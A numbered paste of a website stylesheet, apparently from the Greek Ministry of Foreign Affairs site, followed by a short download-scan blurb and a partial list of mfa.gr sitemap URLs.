  2324. }
  2325. h2.contentheading {
  2326. font-size : 1em;
  2327. font-weight : bold;
  2328. color : #333;
  2329. padding : 1em 0 0.1em 0;
  2330. }
  2331. h3.contentheading {
  2332. font-size : 1em;
  2333. font-weight : bold;
  2334. color : #333;
  2335. padding : 1em 0 0.1em 0;
  2336. }
  2337. div.buttonheading {
  2338. margin-top : -0.5em;
  2339. margin-right : 10px;
  2340. }
  2341. div.item_sectioncategory a {
  2342. text-decoration : none;
  2343. }
  2344. div.item_sectioncategory, div.item_author, div.item_hits, div.item_comments {
  2345. background : url(../images/pencil.gif) 50% 0% no-repeat transparent;
  2346. padding-left : 18px;
  2347. font-family : tahoma, verdana, arial, sans-serif;
  2348. color : #444;
  2349. font-style : normal;
  2350. font-size : 0.92em;
  2351. }
  2352. div.item_createdate, div.item_modifydate {
  2353. font-family : tahoma, verdana, arial, sans-serif;
  2354. color : #444;
  2355. font-style : normal;
  2356. font-size : 0.92em;
  2357. }
  2358. div.item_createdate, div.item_modifydate {
  2359. background-color : transparent;
  2360. }
  2361. div.item_modifydate {
  2362. margin : 10px 0 20px 0;
  2363. }
  2364. div.item_sectioncategory {
  2365. background : url(../images/category.png) 50% 0% no-repeat transparent;
  2366. font-size : 1em;
  2367. }
  2368. div.item_hits {
  2369. background : url(../images/bars.png) 50% 0% no-repeat transparent;
  2370. }
  2371. div.item_comments {
  2372. background : url(../images/comments.gif) 50% 0% no-repeat transparent;
  2373. }
  2374. div.item_related {
  2375. margin : 20px 0 20px 0;
  2376. color : #444;
  2377. }
  2378. div.item_related a {
  2379. line-height : 18px;
  2380. padding-left : 18px;
  2381. background : url(../images/url.png) 50% 0% no-repeat transparent;
  2382. font-family : tahoma, verdana, arial, sans-serif;
  2383. font-size : 0.92em;
  2384. text-decoration : none;
  2385. }
  2386. div.contentpane {
  2387. color : #000;
  2388. text-align : justify;
  2389. }
  2390. .contentdescription {
  2391. float : left;
  2392. margin-bottom : 10px;
  2393. }
  2394. .contentdescription img {
  2395. margin : 18px 5px 2px 5px;
  2396. }
  2397. div.tcs {
  2398. margin-bottom : 10px;
  2399. }
  2400. div.tcs ul {
  2401. margin : 0;
  2402. padding : 10px 0;
  2403. }
  2404. div.tcs ul.table {
  2405. margin : 0;
  2406. padding : 0;
  2407. }
  2408. div.tcs li {
  2409. background-color : #f4f5f7;
  2410. padding : 3px;
  2411. border : #c5d5e3 dotted 1px;
  2412. }
  2413. ul.table li.row0, ul.table li.sectiontableentry1 {
  2414. background-color : #f4f5f7;
  2415. }
  2416. ul.table li.row1, ul.table li.sectiontableentry2 {
  2417. background-color : #e9f0f8;
  2418. }
  2419. ul.table li.sectiontableentry1 a:link, ul.table li.sectiontableentry1 a:visited, ul.table li.sectiontableentry2 a:link, ul.table li.sectiontableentry2 a:visited {
  2420. color : #246fb4;
  2421. font-weight : bold;
  2422. text-decoration : none;
  2423. }
  2424. ul.table li.sectiontableentry1 a:hover, ul.table li.sectiontableentry2 a:hover {
  2425. color : #ff9900;
  2426. }
  2427. div.sectiontablefooter {
  2428. border : #cccccc dashed 1px;
  2429. margin : 15px 0 20px 0;
  2430. }
  2431. div.blog {
  2432. overflow : hidden;
  2433. }
  2434. div.blogleading {
  2435. overflow : hidden;
  2436. clear : both;
  2437. background-color : #f8f8f8;
  2438. border : #ddd solid 1px;
  2439. padding : 4px;
  2440. }
  2441. div.blogcell div.contentpaneopen_text {
  2442. text-align : justify;
  2443. padding : 0.3em;
  2444. }
  2445. .moreLinks {
  2446. color : #444;
  2447. }
  2448. div.blog_more ul {
  2449. margin : 5px;
  2450. }
  2451. div.blog_more li {
  2452. list-style-type : square;
  2453. }
  2454. div.blog_more li a.blogsection {
  2455. color : #275870;
  2456. font-size : 8pt;
  2457. text-decoration : none;
  2458. }
  2459. div.blog_more li a.blogsection:hover {
  2460. color : #ff9900;
  2461. }
  2462. div.contentpaneopen_text {
  2463. text-align : justify;
  2464. padding : 0.5em;
  2465. }
  2466. div.contentpaneopen_text li {
  2467. list-style-type : disc;
  2468. }
  2469. a.contentpagetitle:link, a.contentpagetitle:visited {
  2470. font-size : 1.2em;
  2471. color : #246fb4;
  2472. text-decoration : none;
  2473. }
  2474. a.contentpagetitle:hover {
  2475. color : #ff9900;
  2476. text-decoration : none;
  2477. }
  2478. a.category:link, a.category:visited {
  2479. font-weight : bold;
  2480. color : #246fb4;
  2481. text-decoration : none;
  2482. }
  2483. a.category:hover {
  2484. color : #ff9900;
  2485. }
  2486. a.readon:link, a.readon:visited {
  2487. background-color : #e0e7fc;
  2488. border : #2465a2 solid 1px;
  2489. color : #394a53;
  2490. padding : 3px;
  2491. text-decoration : none;
  2492. margin : 10px 0 20px 0;
  2493. display : block;
  2494. float : left;
  2495. }
  2496. a.readon:hover {
  2497. background-color : #2465a2;
  2498. color : #ffffff;
  2499. }
  2500. div.blogleading a.readon {
  2501. background-color : #e0e7fc;
  2502. border : #2465a2 solid 1px;
  2503. color : #394a53;
  2504. padding : 3px;
  2505. text-decoration : none;
  2506. margin : 10px 0 20px 0;
  2507. }
  2508. div.blogleading a.readon:hover {
  2509. background-color : #2465a2;
  2510. color : #ffffff;
  2511. }
  2512. span.pagenav {
  2513. font-size : 0.8em;
  2514. }
  2515. a.pagenav:link, a.pagenav:visited, .pagenav_next a:link, .pagenav_next a:visited, .pagenav_prev a:link, .pagenav_prev a:visited {
  2516. font-size : 0.8em;
  2517. background-color : #e0e7fc;
  2518. color : #394a53;
  2519. padding : 3px;
  2520. text-decoration : none;
  2521. border : #2465a2 solid 1px;
  2522. }
  2523. a.pagenav:hover, .pagenav_next a:hover, .pagenav_prev a:hover {
  2524. background-color : #2465a2;
  2525. color : #ffffff;
  2526. }
  2527. div.weblinks ul.table {
  2528. float : left;
  2529. width : 98%;
  2530. border : 0;
  2531. padding : 0;
  2532. margin : 0;
  2533. margin-bottom : 10px;
  2534. }
  2535. div.weblinks ul.table li {
  2536. padding : 2px;
  2537. margin : 2px;
  2538. text-indent : 0;
  2539. }
  2540. div.weblinks a.category:link, div.weblinks a.category:visited {
  2541. color : #246fb4;
  2542. text-decoration : underline;
  2543. }
  2544. div.weblinks a.category:hover {
  2545. color : #ff9900;
  2546. }
  2547. #weblinksform {
  2548. background-color : #eeeeee;
  2549. border : #ccc dashed 1px;
  2550. margin : 4px;
  2551. padding : 4px;
  2552. }
  2553. div.newsfeeds ul li, div.newsfeeds ul.table li {
  2554. color : #555;
  2555. padding : 2px 0;
  2556. }
  2557. table.contentpaneopen {
  2558. padding : 0;
  2559. margin : 5px 0 20px 0;
  2560. font-size : 0.9em;
  2561. }
  2562. table.contentpaneopen th {
  2563. padding : 2px;
  2564. margin : 0;
  2565. border-collapse : collapse;
  2566. border : none 0;
  2567. font-weight : bold;
  2568. color : #fff;
  2569. background-color : #2f627c;
  2570. }
  2571. table.contentpaneopen #activecolumn {
  2572. background-color : #9c0909;
  2573. }
  2574. table.contentpaneopen th a {
  2575. text-decoration : none;
  2576. color : #fff;
  2577. }
  2578. table.contentpaneopen th a:hover {
  2579. color : #e6e6d0;
  2580. }
  2581. tr.sectiontableentry1 {
  2582. background-color : #f2f3f4;
  2583. }
  2584. tr.sectiontableentry2 {
  2585. background-color : #e7e7d5;
  2586. }
  2587. tr.sectiontableentry1:hover {
  2588. background-color : #e1e1cb;
  2589. }
  2590. tr.sectiontableentry2:hover {
  2591. background-color : #e1e1cb;
  2592. }
  2593. table.contentpaneopen td {
  2594. padding : 4px 0 4px 0;
  2595. }
  2596. #vuserprofile h1 {
  2597. font-size : 1.3em;
  2598. color : #1a4f6a;
  2599. font-weight : bold;
  2600. }
  2601. #vuserprofile h2 {
  2602. font-size : 1.2em;
  2603. color : #1a4f6a;
  2604. font-weight : bold;
  2605. }
  2606. div.contactscats ul li a {
  2607. text-decoration : none;
  2608. font-weight : bold;
  2609. }
  2610. div.contactscats ul.table li a {
  2611. text-decoration : underline;
  2612. font-weight : normal;
  2613. }
  2614. ul.polltable li.row0, ul.polltable li.sectiontableentry1 {
  2615. background-color : #f8f8f8;
  2616. }
  2617. ul.polltable li.row1, ul.polltable li.sectiontableentry2 {
  2618. background-color : #f8f8f8;
  2619. }
  2620. ul.polltable li.sectiontableentry1 a:link, ul.polltable li.sectiontableentry1 a:visited, ul.polltable li.sectiontableentry2 a:link, ul.polltable li.sectiontableentry2 a:visited {
  2621. color : #5f5f30;
  2622. font-weight : bold;
  2623. text-decoration : none;
  2624. }
  2625. ul.polltable li.sectiontableentry1 a:hover, ul.polltable li.sectiontableentry2 a:hover {
  2626. color : #ff9900;
  2627. }
  2628. .modfpg-ctitle {
  2629. background : url(../images/build.png) top left no-repeat;
  2630. }
  2631. .modfpg-introtitle a, .modfpg-introtitle a:visited, .modfpg-introtitle a:active {
  2632. color : #246fb4;
  2633. text-decoration : none;
  2634. }
  2635. .modfpg-introtitle a:hover {
  2636. color : #ff9900;
  2637. text-decoration : none;
  2638. }
  2639. .search {
  2640. background : url(../images/searchbox.png) top left no-repeat;
  2641. padding : 2px 5px 1px 22px;
  2642. margin : 5px 10px 10px 7px;
  2643. width : 260px;
  2644. height : 25px;
  2645. }
  2646. .search input, .search input.inputbox {
  2647. border : 0;
  2648. background-color : transparent;
  2649. color : #246fb4;
  2650. padding : 1px;
  2651. width : 180px;
  2652. margin : 0;
  2653. }
  2654. span.highlight {
  2655. color : #000;
  2656. font-weight : bold;
  2657. }
  2658. .moduletable-lang {
  2659. text-align : center;
  2660. color : #ffffff;
  2661. font-weight : bold;
  2662. }
  2663. .moduletable-lang a {
  2664. color : #eee;
  2665. }
  2666. .selectbox-lang {
  2667. background-color : #1c6db8;
  2668. color : #fff;
  2669. padding : 2px;
  2670. border : #295673 solid 1px;
  2671. }
  2672. #rightcolumn div.moduletable {
  2673. margin : 5px 0;
  2674. padding : 0;
  2675. }
  2676. #rightcolumn div.moduletable h3 {
  2677. background : url(../images/modh3.png) 50% 4px no-repeat #164d83;
  2678. font-size : 0.95em;
  2679. font-weight : bold;
  2680. color : #ffffff;
  2681. border : #0b457b solid 1px;
  2682. margin : 0 3px 0 0;
  2683. padding : 4px 0 4px 24px;
  2684. }
  2685. #rightcolumn div.moduletable p {
  2686. margin : 0;
  2687. }
  2688. .moduletable-flashmap {
  2689. border : #4e85d6 solid 1px;
  2690. }
  2691. .moduletable-banner {
  2692. text-align : center;
  2693. padding : 10px 0 10px 0;
  2694. }
  2695. div.userlogin {
  2696. min-height : 55px;
  2697. }
  2698. .userlogin img {
  2699. margin : 0 2px 0 0;
  2700. }
  2701. div.userlogin a, div.userlogin a:visited {
  2702. background : url(../images/info.png) 50% 0% no-repeat transparent;
  2703. padding : 2px 0 1px 17px;
  2704. font-size : 0.92em;
  2705. color : #224b60;
  2706. text-decoration : none;
  2707. }
  2708. div.userlogin a:hover {
  2709. text-decoration : underline;
  2710. }
  2711. ul.mostread, ul.latestnews {
  2712. margin-left : 0;
  2713. margin-bottom : 10px;
  2714. }
  2715. ul.mostread li.latestnews, ul.latestnews li.latestnews {
  2716. list-style-type : none;
  2717. margin-left : 0.2em;
  2718. padding-left : 18px;
  2719. background : url(../images/bullet1.png) 50% 2px no-repeat transparent;
  2720. }
  2721. a.mostread, a.latestnews, a.mostread:visited, a.latestnews:visited {
  2722. color : #4175df;
  2723. text-decoration : none;
  2724. }
  2725. a.mostread:hover, a.latestnews:hover {
  2726. color : #fdad45;
  2727. text-decoration : underline;
  2728. }
  2729. div.syndicate {
  2730. padding : 4px;
  2731. }
  2732. div.syndicate img {
  2733. margin : 2px;
  2734. }
  2735. #topweblink {
  2736. background-color : #e7f3fc;
  2737. padding : 5px;
  2738. padding-left : 20px;
  2739. margin : 4px;
  2740. margin-bottom : 20px;
  2741. border : #20679d dashed 1px;
  2742. }
  2743. #topweblink h3 {
  2744. color : #20679d;
  2745. padding : 0;
  2746. margin : 2px;
  2747. font-weight : bold;
  2748. }
  2749. #topweblink img {
  2750. margin : 4px;
  2751. padding : 2px;
  2752. border : #437493 solid 1px;
  2753. }
  2754. #topweblink-explain {
  2755. color : #333;
  2756. }
  2757. #topweblink-desc {
  2758. font-style : italic;
  2759. }
  2760. #topweblink-date {
  2761. font-size : 0.9em;
  2762. color : #555;
  2763. }
  2764. #topweblink a {
  2765. text-decoration : underline;
  2766. font-weight : bold;
  2767. color : #0a5893;
  2768. }
  2769. .navigation {
  2770. width : 800px;
  2771. margin : 0 auto;
  2772. height : 24px;
  2773. }
  2774. .navigation ul {
  2775. overflow : hidden;
  2776. margin : 0;
  2777. padding : 0;
  2778. text-align : center;
  2779. }
  2780. .navigation li {
  2781. margin : 0 auto;
  2782. padding : 0;
  2783. display : inline-block;
  2784. border : #2465a2 solid 1px;
  2785. }
  2786. .navigation li a, .navigation li a:visited {
  2787. color : #394a53;
  2788. display : block;
  2789. font-family : tahoma, sans-serif;
  2790. font-weight : normal;
  2791. font-size : 0.9em;
  2792. line-height : 18px;
  2793. padding : 0 8px;
  2794. text-decoration : none;
  2795. background-color : #e0e7fc;
  2796. }
  2797. .navigation li a:hover {
  2798. color : #f9f9f9;
  2799. background-color : #2465a2;
  2800. }
  2801. .navigation li #active_menu-nav {
  2802. color : #f9f9f9;
  2803. background-color : #164d83;
  2804. }
  2805. a.mainlevel, a.mainlevel:visited {
  2806. margin : 0;
  2807. padding : 0;
  2808. text-decoration : none;
  2809. display : block;
  2810. font-size : 1em;
  2811. line-height : 1.5em;
  2812. color : #000;
  2813. margin-left : -5px;
  2814. padding-left : 5px;
  2815. }
  2816. a.mainlevel:hover {
  2817. background-color : #e9f1f9;
  2818. text-decoration : none;
  2819. }
  2820. a.sublevel {
  2821. line-height : 1.5em;
  2822. padding : 2px;
  2823. color : #000;
  2824. text-decoration : none;
  2825. }
  2826. a.sublevel:hover {
  2827. text-decoration : underline;
  2828. }
  2829. a#active_menu {
  2830. color : #4a96dc;
  2831. font-weight : bold;
  2832. }
  2833. #rightcolumn ul.mainlevel {
  2834. padding : 0;
  2835. margin : 0;
  2836. }
  2837. #rightcolumn ul.mainlevel li {
  2838. list-style-type : none;
  2839. margin : 0;
  2840. padding : 0;
  2841. background : none;
  2842. border-bottom : 1px solid #f1eede;
  2843. }
  2844. #rightcolumn ul.mainlevel li a {
  2845. background : url(../images/file.png) 50% 7px no-repeat #dae0e2;
  2846. margin : 0 0 0 -5px;
  2847. padding : 2px 0 2px 27px;
  2848. font-size : 1em;
  2849. color : #000;
  2850. text-decoration : none;
  2851. display : block;
  2852. }
  2853. #rightcolumn ul.mainlevel li a:hover {
  2854. color : #4a96dc;
  2855. background : url(../images/file.png) 50% 7px no-repeat #dadaea;
  2856. }
  2857. #rightcolumn ul.mainlevel a#active_menu {
  2858. color : #4a96dc;
  2859. font-weight : bold;
  2860. }
  2861. span.mosimage {
  2862. text-align : center;
  2863. }
  2864. span.mosimage_caption {
  2865. display : block;
  2866. margin : 3px 0;
  2867. font-size : 0.8em;
  2868. color : #666;
  2869. border : 0;
  2870. }
  2871. span.content_rating {
  2872. background : url(../images/bars.png) 50% 0% no-repeat transparent;
  2873. padding-left : 18px;
  2874. font-family : tahoma, verdana, arial, sans-serif;
  2875. color : #444;
  2876. font-style : normal;
  2877. font-size : 0.92em;
  2878. }
  2879. span.content_rating img {
  2880. position : relative;
  2881. vertical-align : bottom;
  2882. }
  2883. span.content_vote {
  2884. font-weight : bold;
  2885. font-family : tahoma, verdana, arial, sans-serif;
  2886. color : #444;
  2887. font-style : normal;
  2888. font-size : 0.92em;
  2889. background-color : #eeeeee;
  2890. padding : 8px;
  2891. border : #ccc solid 1px;
  2892. }
  2893. span.content_vote input.button {
  2894. font-size : 0.95em;
  2895. font-family : tahoma, verdana, sans-serif;
  2896. }
  2897. .pagenavcounter {
  2898. font-size : 0.92em;
  2899. color : #999;
  2900. }
  2901. div.pagenavbar {
  2902. font-size : 0.92em;
  2903. color : #999;
  2904. border : #aaa dashed 1px;
  2905. padding : 6px;
  2906. width : auto;
  2907. }
  2908. div.pagenavbar a, div.pagenavbar a:link, div.pagenavbar a:visited, div.pagenavbar a:hover {
  2909. color : #2e5f78;
  2910. text-decoration : none;
  2911. margin : 10px;
  2912. }
  2913. div.pagenavbar a:hover {
  2914. color : #ff9900;
  2915. }
  2916. .roundtoc {
  2917. font-size : 0.95em;
  2918. padding : 4px 4px 4px 0;
  2919. background-color : #f9f9f9;
  2920. border : #164d83 solid 1px;
  2921. text-align : left;
  2922. line-height : 12px;
  2923. margin-top : 5px;
  2924. margin-left : 5px;
  2925. }
  2926. ul.contenttoc {
  2927. background : #f9f9f9;
  2928. border : 0;
  2929. font-size : 0.95em;
  2930. }
  2931. ul.contenttoc li.headtoc {
  2932. background : #1a558d;
  2933. color : #89d8fd;
  2934. font-size : 0.9em;
  2935. padding : 4px;
  2936. }
  2937. ul.contenttoc a.toclink:link, ul.contenttoc a.toclink:visited {
  2938. color : #246fb4;
  2939. font-size : 0.95em;
  2940. text-decoration : none;
  2941. line-height : 12px;
  2942. }
  2943. ul.contenttoc a.toclink:hover {
  2944. color : #ff9900;
  2945. }
  2946. #content_user1 h3 {
  2947. background : url(../images/modh3.png) 50% 4px no-repeat #164d83;
  2948. font-size : 0.95em;
  2949. font-weight : bold;
  2950. color : #ffffff;
  2951. border : #0b457b solid 1px;
  2952. margin : 0 0 5px 0;
  2953. padding : 4px 0 4px 24px;
  2954. }
  2955. #content_user2 h3 {
  2956. background : url(../images/modh3.png) 50% 4px no-repeat #164d83;
  2957. font-size : 0.95em;
  2958. font-weight : bold;
  2959. color : #ffffff;
  2960. border : #0b457b solid 1px;
  2961. margin : 0 0 5px 0;
  2962. padding : 4px 0 4px 24px;
  2963. }
  2964. #content_advert1 h3 {
  2965. background : url(../images/modh3.png) 50% 4px no-repeat #f3f4f7;
  2966. font-size : 0.92em;
  2967. font-weight : bold;
  2968. color : #c61212;
  2969. border : #1c66a4 solid 1px;
  2970. margin : 5px 440px 0 20px;
  2971. padding : 4px 0 4px 24px;
  2972. }
  2973. a.button_round {
  2974. display : block;
  2975. width : 150px;
  2976. height : 23px;
  2977. text-align : center;
  2978. margin : 6px auto;
  2979. padding : 3px 0;
  2980. color : #246fb4;
  2981. text-decoration : none;
  2982. font-size : 11px;
  2983. background : url(../images/button_round.png) 0% 0% no-repeat transparent;
  2984. }
  2985. a.button_round:hover {
  2986. color : #ff9900;
  2987. }
  2988. a.external, a.external:visited, a.external:hover {
  2989. background : url(../images/external.png) center right no-repeat;
  2990. padding-right : 13px;
  2991. }
  2992. .gototop {
  2993. position : absolute;
  2994. right : 20px;
  2995. top : -21px;
  2996. z-index : 2;
  2997. }
  2998. a.ypex_gototop, a.ypex_gototop:link, a.ypex_gototop:active, a.ypex_gototop:hover, a.ypex_gototop:visited {
  2999. background : url(../images/arrow_up.png) -2px 2px no-repeat transparent;
  3000. font-size : 11px;
  3001. font-family : tahoma, verdana, sans-serif;
  3002. padding : 0 0 0 20px;
  3003. text-decoration : none;
  3004. color : #234b7c;
  3005. }
  3006. a.ypex_gototop:hover {
  3007. color : #ff9900;
  3008. }
  3009. .service_mfa, a.service_mfa, a.service_mfa:link, a.service_mfa:active, a.service_mfa:hover, a.service_mfa:visited {
  3010. padding : 10px 0;
  3011. text-align : center;
  3012. font-size : 0.75em;
  3013. font-weight : bold;
  3014. line-height : 1.1em;
  3015. color : #2191c5;
  3016. }
  3017. a.service_mfa:hover {
  3018. color : #ff9900;
  3019. }
  3020. table.pinakas {
  3021. margin : 10px 0;
  3022. padding : 0;
  3023. width : 100%;
  3024. border : #b7d3eb solid 1px;
  3025. border-collapse : collapse;
  3026. font-size : 0.95em;
  3027. text-align : center;
  3028. }
  3029. table.pinakas td {
  3030. background-color : #f8f8f8;
  3031. color : #333;
  3032. padding : 0 2px;
  3033. border : #b7d3eb solid 1px;
  3034. }
  3035. table.pinakas tr:hover td {
  3036. background-color : #eaedf2;
  3037. color : #bf1919;
  3038. cursor : default;
  3039. }
  3040. table.pinakasvisas {
  3041. margin : 10px 0;
  3042. padding : 0;
  3043. width : 100%;
  3044. border : #b7d3eb solid 1px;
  3045. border-collapse : collapse;
  3046. font-size : 0.95em;
  3047. text-align : left;
  3048. }
  3049. table.pinakasvisas td {
  3050. background-color : #f8f8f8;
  3051. color : #333;
  3052. padding : 0 2px;
  3053. border : #b7d3eb solid 1px;
  3054. }
  3055. table.pinakasvisas tr:hover td {
  3056. background-color : #eaedf2;
  3057. color : #bf1919;
  3058. cursor : default;
  3059. }
  3060. table.media_table {
  3061. margin : 4px 0;
  3062. padding : 0;
  3063. width : 100%;
  3064. border-collapse : collapse;
  3065. font-size : 0.95em;
  3066. text-align : justify;
  3067. }
  3068. table.media_table td {
  3069. vertical-align : top;
  3070. padding : 0 5px;
  3071. }
  3072. .phone {
  3073. background : url(../images/phone.png) 0% 0% no-repeat transparent;
  3074. padding : 5px 0 6px 28px;
  3075. line-height : 30px;
  3076. }
  3077. .email {
  3078. background : url(../images/email.png) 0% 0% no-repeat transparent;
  3079. padding : 5px 0 6px 28px;
  3080. line-height : 30px;
  3081. }
  3082. .sound_media, a.sound_media, a.sound_media:link, a.sound_media:active, a.sound_media:hover, a.sound_media:visited {
  3083. background : url(../images/sound_media.png) 0% 0% no-repeat transparent;
  3084. padding : 10px 0 10px 36px;
  3085. line-height : 32px;
  3086. text-decoration : none;
  3087. color : #2191c5;
  3088. }
  3089. a.sound_media:hover {
  3090. color : #ff9900;
  3091. }
  3092. .video_media, a.video_media, a.video_media:link, a.video_media:active, a.video_media:hover, a.video_media:visited {
  3093. background : url(../images/video_media.png) 0% 0% no-repeat transparent;
  3094. padding : 10px 0 10px 36px;
  3095. line-height : 32px;
  3096. text-decoration : none;
  3097. color : #2191c5;
  3098. }
  3099. a.video_media:hover {
  3100. color : #ff9900;
  3101. }
  3102. .photo_media, a.photo_media, a.photo_media:link, a.photo_media:active, a.photo_media:hover, a.photo_media:visited {
  3103. background : url(../images/photo_media.png) 0% 0% no-repeat transparent;
  3104. padding : 10px 0 10px 36px;
  3105. line-height : 32px;
  3106. text-decoration : none;
  3107. color : #2191c5;
  3108. }
  3109. a.photo_media:hover {
  3110. color : #ff9900;
  3111. }
  3112. span.periehomena {
  3113. background : url(../images/book.png) 50% 8px no-repeat #f8f8f8;
  3114. padding : 8px 8px 8px 30px;
  3115. border-top : 1px dotted #dddddd;
  3116. border-bottom : 1px dotted #dddddd;
  3117. }
  3118. .pdf_doclink, a.pdf_doclink, a.pdf_doclink:link, a.pdf_doclink:active, a.pdf_doclink:hover, a.pdf_doclink:visited {
  3119. background : url(../images/pdf_button.png) 0% 0% no-repeat transparent;
  3120. padding : 1px 0 2px 20px;
  3121. text-decoration : none;
  3122. color : #2191c5;
  3123. }
  3124. a.pdf_doclink:hover {
  3125. color : #ff9900;
  3126. }
  3127. .rtf_doclink, a.rtf_doclink, a.rtf_doclink:link, a.rtf_doclink:active, a.rtf_doclink:hover, a.rtf_doclink:visited {
  3128. background : url(../images/rtf_button.png) 0% 0% no-repeat transparent;
  3129. padding : 1px 0 2px 20px;
  3130. text-decoration : none;
  3131. color : #2191c5;
  3132. }
  3133. a.rtf_doclink:hover {
  3134. color : #ff9900;
  3135. }
  3136. .contact_link, a.contact_link, a.contact_link:link, a.contact_link:active, a.contact_link:hover, a.contact_link:visited {
  3137. background : url(../images/emailButton.png) 0% 0% no-repeat transparent;
  3138. padding : 1px 0 2px 20px;
  3139. text-decoration : none;
  3140. color : #2191c5;
  3141. }
  3142. a.contact_link:hover {
  3143. color : #ff9900;
  3144. }
  3145. p.roundbox-head {
  3146. font-size : 1em;
  3147. margin : 1em 0;
  3148. padding : 8px;
  3149. background-color : #e9f0f8;
  3150. border : #ddd solid 1px;
  3151. color : #222;
  3152. }
  3153. p.roundbox {
  3154. font-size : 1em;
  3155. margin : 1em 0;
  3156. padding : 8px;
  3157. background-color : #f8f8f8;
  3158. border : #ddd solid 1px;
  3159. color : #222;
  3160. }
  3161. .moduletable-round {
  3162. font-size : 1em;
  3163. margin : 0 5px;
  3164. padding : 0;
  3165. background-color : #fafaff;
  3166. border : #adadad solid 1px;
  3167. color : #222;
  3168. }
  3169. .navigation ul {
  3170. overflow : visible;
  3171. }
  3172. ul.mainlevel-hnav {
  3173. float : left;
  3174. list-style : none;
  3175. line-height : 28px;
  3176. background-color : #124175;
  3177. font-weight : bold;
  3178. padding : 0;
  3179. margin : 0;
  3180. }
  3181. ul.mainlevel-hnav ul {
  3182. float : left;
  3183. list-style : none;
  3184. background-color : #f7f8f9;
  3185. font-weight : bold;
  3186. padding : 0;
  3187. margin : 0;
  3188. border-bottom : 1px solid #05a9f5;
  3189. border-right : 1px solid #05a9f5;
  3190. border-left : 1px solid #05a9f5;
  3191. }
  3192. ul.mainlevel-hnav a, ul.mainlevel-hnav a:link, ul.mainlevel-hnav a:visited {
  3193. display : block;
  3194. font-family : Tahoma, Verdana, Arial, Geneva, Helveticaz;
  3195. font-size : 0.92em;
  3196. font-weight : normal;
  3197. color : #89d8fd;
  3198. text-decoration : none;
  3199. margin : 0;
  3200. padding : 0.55em 0.56em;
  3201. border-right : 1px solid #1a558d;
  3202. font-weight : bold;
  3203. }
  3204. ul.mainlevel-hnav a:hover {
  3205. text-decoration : underline;
  3206. color : #104074;
  3207. }
  3208. ul.mainlevel-hnav ul a:hover {
  3209. color : #104074;
  3210. text-decoration : underline;
  3211. }
  3212. ul.mainlevel-hnav ul li a, ul.mainlevel-hnav ul li a:link, ul.mainlevel-hnav ul li a:visited {
  3213. color : #104074;
  3214. border-right : 0 solid #f2f6fe;
  3215. }
  3216. ul.mainlevel-hnav ul li a:hover {
  3217. color : #104074;
  3218. text-decoration : underline;
  3219. border-right : 0 solid #f2f6fe;
  3220. }
  3221. ul.mainlevel-hnav ul li li a, ul.mainlevel-hnav ul li li a:link, ul.mainlevel-hnav ul li li a:visited {
  3222. color : #104074;
  3223. border-right : 0 solid #f2f6fe;
  3224. }
  3225. ul.mainlevel-hnav ul li li a:hover {
  3226. color : #104074;
  3227. text-decoration : underline;
  3228. border-right : 0 solid #f2f6fe;
  3229. }
  3230. ul.mainlevel-hnav a.suckerhdaddy, ul.mainlevel-hnav a.suckerhdaddy:link, ul.mainlevel-hnav a.suckerhdaddy:visited {
  3231. background : url(suckerarrow.gif) 50% 100% no-repeat;
  3232. color : #104074;
  3233. }
  3234. ul.mainlevel-hnav a.suckerhdaddy:hover {
  3235. text-decoration : underline;
  3236. color : #104074;
  3237. }
  3238. ul.mainlevel-hnav li {
  3239. float : left;
  3240. padding : 0;
  3241. margin : 0;
  3242. }
  3243. ul.mainlevel-hnav li ul {
  3244. position : absolute;
  3245. left : -999em;
  3246. height : auto;
  3247. width : 22.4em;
  3248. width : 22.6em;
  3249. font-weight : bold;
  3250. margin : 0 0 0 -1px;
  3251. }
  3252. ul.mainlevel-hnav li li {
  3253. width : 100%;
  3254. display : block;
  3255. overflow : visible;
  3256. margin : 0;
  3257. padding : 0;
  3258. }
  3259. ul.mainlevel-hnav li ul ul {
  3260. margin : -28px 0 0 22.6em;
  3261. }
  3262. ul.mainlevel-hnav li:hover ul ul, ul.mainlevel-hnav li:hover ul ul ul, ul.mainlevel-hnav li.sfhover ul ul, ul.mainlevel-hnav li.sfhover ul ul ul {
  3263. left : -999em;
  3264. }
  3265. ul.mainlevel-hnav li:hover ul, ul.mainlevel-hnav li li:hover ul, ul.mainlevel-hnav li li li:hover ul, ul.mainlevel-hnav li.sfhover ul, ul.mainlevel-hnav li li.sfhover ul, ul.mainlevel-hnav li li li.sfhover ul {
  3266. left : auto;
  3267. }
  3268. ul.mainlevel-hnav li:hover ul ul ul ul, ul.mainlevel-hnav li.sfhover ul ul ul ul {
  3269. left : -999em;
  3270. }
  3271. ul.mainlevel-hnav li li li li:hover ul, ul.mainlevel-hnav li li li li.sfhover ul {
  3272. left : auto;
  3273. }
  3274. ul.mainlevel-hnav li:hover ul ul ul ul ul, ul.mainlevel-hnav li.sfhover ul ul ul ul ul {
  3275. left : -999em;
  3276. }
  3277. ul.mainlevel-hnav li li li li li:hover ul, ul.mainlevel-hnav li li li li li.sfhover ul {
  3278. left : auto;
  3279. }
  3280. ul.mainlevel-hnav li:hover, ul.mainlevel-hnav li.sfhover {
  3281. background-color : #e9f3fd;
  3282. }
  3283.  
  3284.  
  3285. In our tests, we found downloads on this site were free of adware, spyware, and other potentially unwanted programs.
  3286.  
  3287.     View detailed analysis
  3288.     Submit a download for analysis
  3289.  
  3290.  
  3291. Sitemap: http://www.mfa.gr/google.xml
  3292. 1. http://www.mfa.gr/cache/rss20-greek.xml
  3293.    2. http://www.mfa.gr/
  3294.    3. http://www.mfa.gr/
  3295.    4. http://www.mfa.gr/en/
  3296.    5. http://www.mfa.gr/fr/
  3297.    6. http://www.mfa.gr/
  3298.    7. http://www.mfa.gr/to-ypourgeio/
  3299.    8. http://www.mfa.gr/igesia/
  3300.    9. http://www.mfa.gr/igesia/ypourgos/o-ypourgos.html
  3301.   10. http://www.mfa.gr/igesia/yfypourgoi/
  3302.   11. http://www.mfa.gr/igesia/genikoi-grammateis/o-genikos-grammateas.html
  3303.   12. http://www.mfa.gr/igesia/genikoi-grammateis/genikos-grammateas-dos-as.html
  3304.   13. http://www.mfa.gr/igesia/genikoi-grammateis/eidike-grammateas-axiopoieses-diethnon-programmaton.html
  3305.   14. http://www.mfa.gr/domi.html
  3306.   15. http://www.mfa.gr/to-ypourgeio/domi/apostoli-kai-armodiotites.html
  3307.   16. http://www.mfa.gr/to-ypourgeio/stelehosi-ypex/
  3308.   17. http://www.mfa.gr/to-ypourgeio/domi/monada-diaheirisis-kriseon.html
  3309.   18. http://www.mfa.gr/to-ypourgeio/diplomatiki-akademia/
